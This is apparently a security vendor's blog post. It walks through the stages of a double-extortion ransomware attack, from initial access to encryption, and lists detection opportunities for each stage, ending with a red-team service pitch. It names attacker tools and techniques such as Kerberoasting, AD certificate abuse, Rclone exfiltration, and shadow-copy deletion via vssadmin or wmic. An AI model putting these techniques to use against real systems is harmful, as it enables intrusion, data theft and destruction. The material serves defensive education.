TL;DR: Modern enterprise ransomware attacks take two to eight weeks from initial access to encryption. Understanding the complete attack chain — and where detection and interruption are possible at each stage — is the foundation of a defensible security posture. Encryption is the last step, not the first.
Why the Playbook Matters More Than the Malware
When a ransomware incident makes headlines, coverage focuses on the encrypted files, the ransom demand, and the business disruption. Rarely discussed is the weeks of methodical activity that preceded the encryption event. Understanding the complete playbook is essential because it reveals that ransomware is not a single event to be blocked — it is a multi-stage campaign with multiple detection and interruption opportunities that most organizations are not configured to use.
Double extortion ransomware — the model used by virtually every major enterprise-targeting ransomware group since 2019 — adds a second extortion lever to traditional encryption. Before encrypting systems, attackers exfiltrate sensitive data to attacker-controlled infrastructure. The ransom demand then combines two threats: pay to receive the decryption key, and pay separately (or in combination) to prevent the publication of stolen data on a leak site. Organizations with functional backups can restore encrypted data but cannot un-exfiltrate the stolen records already in attacker possession. This is why backup availability alone does not resolve a modern ransomware incident.
Stage 1: Initial Access
The attack begins with gaining an initial foothold. The three most common vectors in enterprise ransomware incidents are: exploitation of internet-facing vulnerabilities (unpatched VPN appliances, public-facing web applications, Exchange servers), purchasing access from an Initial Access Broker who has already established persistence, and phishing — either for credential harvesting or for direct payload delivery via malicious document or link.
The initial foothold is often a relatively low-privilege position: a compromised employee account with VPN access, a webshell on a DMZ server, or a phishing-delivered loader executing on a standard workstation. The sophistication of the initial access step is often lower than organizations expect. The subsequent stages are where the real operational expertise is applied.
Detection opportunity: Authentication anomalies (login from new geolocation or device, off-hours VPN connections, credential stuffing patterns), web application firewall alerts on exploitation attempts, email security alerts on malicious attachments.
Stage 2: Persistence and C2 Establishment
Within hours of the initial foothold, attackers implant a command-and-control (C2) beacon. Historically Cobalt Strike was the dominant post-exploitation framework used in ransomware operations; law enforcement actions and increased detection have led to diversification into Sliver, Brute Ratel C4, and custom loaders. The C2 beacon provides the attacker with a persistent, interactive channel into the compromised environment that survives password resets and system reboots.
The beacon is configured to communicate with attacker-controlled infrastructure, typically over HTTPS to blend with legitimate web traffic. Beaconing intervals are configured to avoid anomaly detection — a beacon checking in every four hours generates less alert noise than one operating every 30 seconds. The attacker may remain dormant for days or weeks after establishing the C2, particularly if access was purchased from an IAB and the buyer is conducting due diligence on the target environment.
Detection opportunity: Behavioral EDR detecting unusual process injections, network monitoring for beaconing patterns (regular outbound connections to newly registered or unusual domains), DNS monitoring for queries to recently-created domains or domains with unusual characteristics.
Stages 3–5: Discovery, Lateral Movement, and Privilege Escalation
With a stable C2 channel established, the attacker begins systematic internal reconnaissance. This typically involves Active Directory enumeration (identifying domain controllers, privileged groups, service accounts), network share scanning (identifying file servers and data repositories containing high-value data), and backup system discovery (locating backup infrastructure for later destruction). Tools used are often native Windows utilities (net.exe, nltest.exe, dsquery) or BloodHound for AD path analysis — Living Off the Land techniques that blend with administrative activity.
Lateral movement uses harvested credentials, Pass-the-Hash with captured NTLM hashes, or Pass-the-Ticket with captured Kerberos tickets. Remote service execution via WMI, WinRM, or SMB propagates the C2 beacon to additional systems. The attacker systematically moves toward high-value targets: domain controllers, backup servers, and systems containing the data to be exfiltrated.
Privilege escalation targets domain admin, enterprise admin, or equivalent cloud administration roles. Common techniques include exploiting misconfigured AD Certificate Services (ESC1, ESC8 attack paths), Kerberoasting (cracking service account password hashes offline), and abusing over-permissioned ACLs identified through BloodHound. With domain admin privileges, no further technical obstacles exist to the final stages.
Detection opportunity: Unusual authentication events (NTLM authentication where Kerberos is expected, service accounts authenticating interactively, off-hours domain admin logins), lateral movement indicators in process creation logs, AD enumeration patterns in event logs.
Stage 6: Data Exfiltration — The Double Extortion Component
Before any encryption occurs, the attacker conducts a systematic data exfiltration operation. The goal is to identify and steal the data that carries the highest extortion value: financial records, customer PII, health records, intellectual property, legal documents, M&A materials. Data is typically staged on an internal system, compressed, and transmitted to attacker-controlled infrastructure — often using cloud storage services (Mega, Rclone to S3, or custom SFTP servers) to blend with legitimate traffic.
Exfiltration volumes in enterprise incidents can range from hundreds of gigabytes to multiple terabytes. The transfer occurs over days, throttled to avoid triggering data loss prevention rules or bandwidth anomaly alerts. By the time encryption is deployed, the exfiltration is complete. The stolen data is the negotiation leverage that makes backup-based recovery insufficient.
Detection opportunity: DLP alerts on bulk file staging or compression of sensitive data, network monitoring for large outbound transfers to cloud storage or unusual destinations, endpoint detection for Rclone or similar tools executing with remote storage arguments.
Stages 7–8: Defense Degradation and Encryption
Immediately before deploying the encryptor, attackers systematically degrade defensive capabilities to prevent interruption and maximize encryption coverage. This includes disabling or uninstalling AV and EDR software (often exploiting admin privileges to stop services or tamper with agent configurations), deleting Volume Shadow Copies (the primary Windows backup mechanism) using vssadmin.exe or wmic shadowcopy delete, clearing Windows event logs to complicate forensic recovery, and disabling System Restore points.
The encryptor is then deployed across the environment — typically via a domain-wide Group Policy Object modification, a domain admin PowerShell script, or the C2 framework's built-in deployment capabilities. Encryption targets network shares, database files, and document repositories. Systems are encrypted in a prioritized order designed to maximize business impact before any manual intervention can occur.
Detection opportunity: EDR alerts on VSS deletion, event log clearing (Event ID 1102, 104), service modifications to AV/EDR processes, mass file renaming or modification events characteristic of encryption activity.
| Attack Stage | Typical Duration | Key Detection Method | Interruption Effectiveness |
|---|---|---|---|
| Initial Access | Hours | Auth anomalies, WAF, email security | High — prevents all subsequent stages |
| C2 Establishment | Hours to days | Behavioral EDR, network/DNS monitoring | High — removes attacker control channel |
| Internal Discovery | Days to 1 week | AD enumeration detection, SIEM correlation | High — attacker has not yet escalated privileges |
| Lateral Movement | Days to 2 weeks | Unusual authentication patterns, process creation | Moderate — contain spread, isolate affected systems |
| Privilege Escalation | Hours to days | Privileged account anomalies, AD change monitoring | Moderate — domain compromise not yet complete |
| Data Exfiltration | Days to 1 week | DLP, network monitoring, Rclone detection | Low for recovery — exfiltration cannot be reversed |
| Defense Degradation | Hours | VSS deletion alerts, EDR tamper detection | Low — encryption is imminent |
| Encryption and Ransom | Minutes to hours | File system monitoring, honeypot files | Minimal — damage is largely complete |
The business continuity framing: The question a board should be asking is not "do we have backups?" It is "how long after initial access would we detect an attacker conducting reconnaissance in our environment?" If the honest answer is "we would not detect it until encryption," the organization is operating without meaningful ransomware defense regardless of backup quality.
Lorikeet Security's red team engagements and incident response planning services are designed to answer exactly this question for your organization — not in theory, but through controlled testing of your real detection infrastructure. Book a consultation to discuss your current ransomware detection and response capability.
Test Your Ransomware Detection Coverage Before Attackers Do
Lorikeet Security's red team engagements simulate the complete ransomware attack chain — from initial access through lateral movement and data exfiltration — to measure your detection and response capability at each stage.
